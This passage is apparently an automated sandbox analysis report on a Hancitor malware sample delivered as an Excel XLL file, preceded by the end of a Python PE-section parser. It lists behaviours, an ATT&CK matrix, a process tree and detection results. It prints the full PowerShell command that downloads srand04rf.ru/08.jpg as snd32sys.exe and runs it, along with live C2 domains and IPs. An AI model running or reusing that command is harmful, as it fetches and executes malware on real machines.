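    (header-only stubs and some packers do that)."""
    for name, va, vsize in sections:
        if va <= entry < va + max(vsize, 1):
            return name
    return None


def assess_sections(pe: bytes) -> dict:
    entry, sections = parse_sections(pe)
    ep = entry_section(entry, sections)
    return {
        "entry_rva": entry,
        "entry_section": ep,
        "entry_outside_standard": ep is None or ep.lower() not in STANDARD_SECTIONS,
        "nonstandard_sections": [n for n, _, _ in sections if n.lower() not in STANDARD_SECTIONS],
    }


def build_pe(section_names, entry_rva: int) -> bytes:
    """Constructed PE32 skeleton: DOS header, PE signature, COFF + optional header and
    one section header per name. Not loadable, just enough to parse (sizes invented)."""
    opt_size = 0xE0
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, 0x2102)
    opt = struct.pack("<HBBIIII", 0x10B, 14, 0, 0x1000, 0, 0, entry_rva).ljust(opt_size, b"\0")
    secs = b""
    for i, name in enumerate(section_names):               # each section gets a 0x1000-byte VA slot
        secs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                            0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, 0x60000020)
    return dos + coff + opt + secs


if __name__ == "__main__":
    print(assess_sections(build_pe(SAMPLE_SECTIONS, 0x1100)))
```

Run against a real file, the two interesting outputs are an entry point in a section that is not .text (or in no section at all) and a section list made of names like the ones above; a control build with the usual .text/.rdata/.data/.rsrc/.reloc layout reports nothing.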
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04B212A1 push es; ret 2_2_04B212B0
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062B28D push ecx; ret 16_2_0062B2A0
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062034A push 8BFFFFFFh; ret 16_2_0062034F
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_006208AD push 8BFFFFFFh; ret 16_2_006208B2
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062BBE6 push ecx; ret 16_2_0062BBF9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\snd32sys.exe

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\snd32sys.exe
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00629420 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_00629420
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (4 occurrences)
        Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (181 occurrences)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (5 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1888
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3141
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 673
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1800
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1157
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964 | Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4556 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908 | Thread sleep count: 1800 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5908 | Thread sleep count: 1157 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4884 | Thread sleep count: 43 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920 | Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5180 | Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5276 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep count: 46 > 30
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep time: -2760000s >= -30000s
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep count: 45 > 30
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep time: -2700000s >= -30000s
        Source: C:\Users\Public\snd32sys.exe TID: 4404 | Thread sleep time: -60000s >= -30000s
        Source: C:\Users\Public\snd32sys.exe | Last function: Thread delayed (2 identical entries)
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0065838E FindFirstFileExW,FindNextFileW,FindClose, 16_2_0065838E
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00657FD2 FindFirstFileExW, 16_2_00657FD2
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_006133E0 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 16_2_006133E0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (5 identical entries)
        Source: C:\Users\Public\snd32sys.exe | Thread delayed: delay time: 60000 (3 identical entries)
        Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.334365492.0000000004E33000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
        Source: powershell.exe, 00000002.00000002.349280205.0000000004E27000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.332192660.0000000004A22000.00000004.00000001.sdmp | Binary or memory string: j:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: mshta.exe, 00000001.00000003.224307613.0000000002FDB000.00000004.00000001.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00657943 IsDebuggerPresent, 16_2_00657943
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 16_2_00613560
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0064C285 mov eax, dword ptr fs:[00000030h] 16_2_0064C285
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659D43 mov eax, dword ptr fs:[00000030h] 16_2_00659D43
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659DC9 mov eax, dword ptr fs:[00000030h] 16_2_00659DC9
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659D86 mov eax, dword ptr fs:[00000030h] 16_2_00659D86
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659E24 mov eax, dword ptr fs:[00000030h] 16_2_00659E24
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659ED9 mov eax, dword ptr fs:[00000030h] 16_2_00659ED9
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659F61 mov eax, dword ptr fs:[00000030h] 16_2_00659F61
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659F1D mov eax, dword ptr fs:[00000030h] 16_2_00659F1D
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00659F92 mov eax, dword ptr fs:[00000030h] 16_2_00659F92
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_006B17C3 mov eax, dword ptr fs:[00000030h] 16_2_006B17C3 (2 identical entries)
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_006B138F push dword ptr fs:[00000030h] 16_2_006B138F
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00611390 GetProcessHeap,RtlAllocateHeap, 16_2_00611390
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 identical entries)
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062BAF2 SetUnhandledExceptionFilter, 16_2_0062BAF2
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062B4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_0062B4CC
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062B95F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0062B95F
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00636D21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00636D21

        HIPS / PFW / Operating System Protection Evasion:

        Contains functionality to inject threads in other processes
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00613860 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle, 16_2_00613860
        Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe' (3 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp | Binary or memory string: Program Manager
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp | Binary or memory string: Progman
        Source: snd32sys.exe, 00000010.00000002.490796667.0000000001A10000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062BBFB cpuid 16_2_0062BBFB
        Source: C:\Users\Public\snd32sys.exe | Code function: EnumSystemLocalesW, 16_2_0065C067
        Source: C:\Users\Public\snd32sys.exe | Code function: EnumSystemLocalesW, 16_2_0065C0D0
        Source: C:\Users\Public\snd32sys.exe | Code function: EnumSystemLocalesW, 16_2_0065C16B
        Source: C:\Users\Public\snd32sys.exe | Code function: ___crtGetLocaleInfoEx, 16_2_0062A104
        Source: C:\Users\Public\snd32sys.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 16_2_0065C1F6
        Source: C:\Users\Public\snd32sys.exe | Code function: GetLocaleInfoW, 16_2_0065C449
        Source: C:\Users\Public\snd32sys.exe | Code function: EnumSystemLocalesW, 16_2_00651499
        Source: C:\Users\Public\snd32sys.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 16_2_0065C56F
        Source: C:\Users\Public\snd32sys.exe | Code function: EnumSystemLocalesW, 16_2_00651599
        Source: C:\Users\Public\snd32sys.exe | Code function: GetLocaleInfoW, 16_2_0065C675
        Source: C:\Users\Public\snd32sys.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 16_2_0065C744
        Source: C:\Users\Public\snd32sys.exe | Code function: GetLocaleInfoW, 16_2_0062A79B
        Source: C:\Users\Public\snd32sys.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 16_2_0065BDC5
        Source: C:\Users\Public\snd32sys.exe | Code function: GetLocaleInfoW, 16_2_00651EBC
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 identical entries)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 identical entries)
        Source: C:\Users\Public\snd32sys.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062B84D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 16_2_0062B84D
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00657096 _free,_free,_free,GetTimeZoneInformation,_free, 16_2_00657096
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00611A80 GetVersion,wsprintfA,wsprintfA, 16_2_00611A80

        Remote Access Functionality:

        Yara detected Hancitor
        Source: Yara match | File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Data Obfuscation 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Exploitation for Client Execution 1 | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 2 | LSASS Memory | File and Directory Discovery 2 | Remote Desktop Protocol | Email Collection 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Logon Script (Windows) | Software Packing 11 | Security Account Manager | System Information Discovery 36 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Encrypted Channel 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | PowerShell 1 | Logon Script (Mac) | Logon Script (Mac) | Masquerading 111 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 21 | LSA Secrets | Security Software Discovery 21 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 123 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 112 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Virtualization/Sandbox Evasion 21 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Network Configuration Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
        (Digits after a technique name are the signature hit counters shown in the original matrix.)

        Behavior Graph

        Behavior Graph ID: 445958 | Sample: 0708_5355150121.xll | Start date: 08/07/2021 | Architecture: WINDOWS | Score: 100
        Signatures on the sample node: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
        Process tree recovered from the graph:
        • EXCEL.EXE
          • Network: srand04rf.ru 8.211.241.0, ports 49724, 49748, 80 (CNNIC-ALIBABA-US-NET-AP Alibaba US Technology Co Ltd, Singapore)
          • Dropped: C:\Users\Public\res32.hta (HTML)
          • mshta.exe
            • powershell.exe (signatures: Drops PE files to the user root directory; Powershell drops PE file)
              • snd32sys.exe
                • Network: sudepallon.com 77.222.42.67, ports 49757, 49758, 49759 (SWEB-AS RU, Russian Federation); elb097307-934924932.us-east-1.elb.amazonaws.com 23.21.173.155, ports 49756, 80 (AMAZON-AES US, United States); 2 other IPs or domains
                • Signatures: Detected unpacking (overwrites its own PE header); May check the online IP address of the machine; Contains functionality to inject threads in other processes
              • powershell.exe
                • Network: srand04rf.ru; 192.168.2.1 (unknown)
                • Dropped: C:\Users\Public\snd32sys.exe (PE32)
              • conhost.exe

        Screenshots


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

Source | Detection | Scanner | Label
0708_5355150121.xll | 24% | Virustotal |
0708_5355150121.xll | 17% | ReversingLabs | Win32.Trojan.Babar

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

Source | Detection | Scanner | Label
16.2.snd32sys.exe.610000.0.unpack | 100% | Avira | TR/Dropper.Gen

        Domains

        No Antivirus matches

        URLs

Source | Detection | Scanner | Label
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | Avira URL Cloud | safe
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
http://srand04rf.ru/08 | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
